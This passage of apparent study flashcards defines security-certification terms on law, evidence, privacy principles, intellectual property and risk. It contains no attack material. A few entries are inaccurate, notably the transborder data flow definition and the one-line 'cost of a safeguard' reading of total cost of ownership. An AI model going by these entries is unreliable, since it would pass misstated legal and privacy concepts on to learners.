constitutes second-hand evidence. As opposed to direct evidence, which someone has witnessed with her five senses, involves indirect information. Generally inadmissable defined by Rule 802. Business and computer generated records are generally considered hearsay evidence.
Privacy Act of 1974
created to codify protection of US citizens' data that is being used by the federal government. Act defined guidelines regarding how US citizens' PII would be used, collected, and distributed
Intellectual Property Law
intangible property that resulted from a creative act. Control the use of intangible property that can often be trivial to reproduce or abuse once made public or known.
Non-repudiation
means a user cannot deny(repudiate) having performed a transaction. Combination of authentication, and integrity. Non-repudiation authenticates the identity of a user and ensures the integrity.
Least Privilege
means users should be granted the minimum amount of access (authorization) required to do their jobs, but no more.
Patent
provide monopoly to the patent holder on the right to use, make , or sell an invention for a period of time in exchange for the patent holder's making the invention public.
Financial Damages: Compensatory
provide the victim with a financial award in effort to compensate for the loss or injury incurred as a direct result of the wrongdoing.
Due Care
provides a framework that helps to define minimum standard of protection that business stakeholders must attempt to achieve.
Corroborative Evidence
provides additional support for a fact that might have been called into question.
Financial Damages: Punitive
punish an individual or organization. Damages are typically awarded to attempt to discourage a particularly egregious violation where the compensatory and statutory damages alone would not act as a deterrent.
Copyright
represents a type of intellectual property that protects the form of expression in artistic,musical, or literary works, and is typically denoted by the circle c symbol as shown. Purpose to preclude unauthorized duplication, distribution, modification. (70 years)
Transborder Flows of Personal Data(1980)
requires that a citizen's personal data flow between companies based in divergent regions.
Authorization
the actions you can perform on system once you have been identified and authenticated. Actions i.e. reading, writing, executing files or programs.
Total Cost of Ownership
the cost of a safeguard
Annualized Loss Expectancy(ALE)
the cost of loss due to a risk over a year
Accountability Principle
the entity using the personal data should be accountable for adhering to the principles above.
Openness Principle
the general policy concerning collection and use of personal data should be readily available
Civil Law
the most common of the major legal systems. judicial precedents and particular case rulings do not carry the weight they do under common law.
Purpose Specification Principle
the purpose for the data collection should be known, and the subsequent use of the data should be limited to the purposes outlined at the time of collection.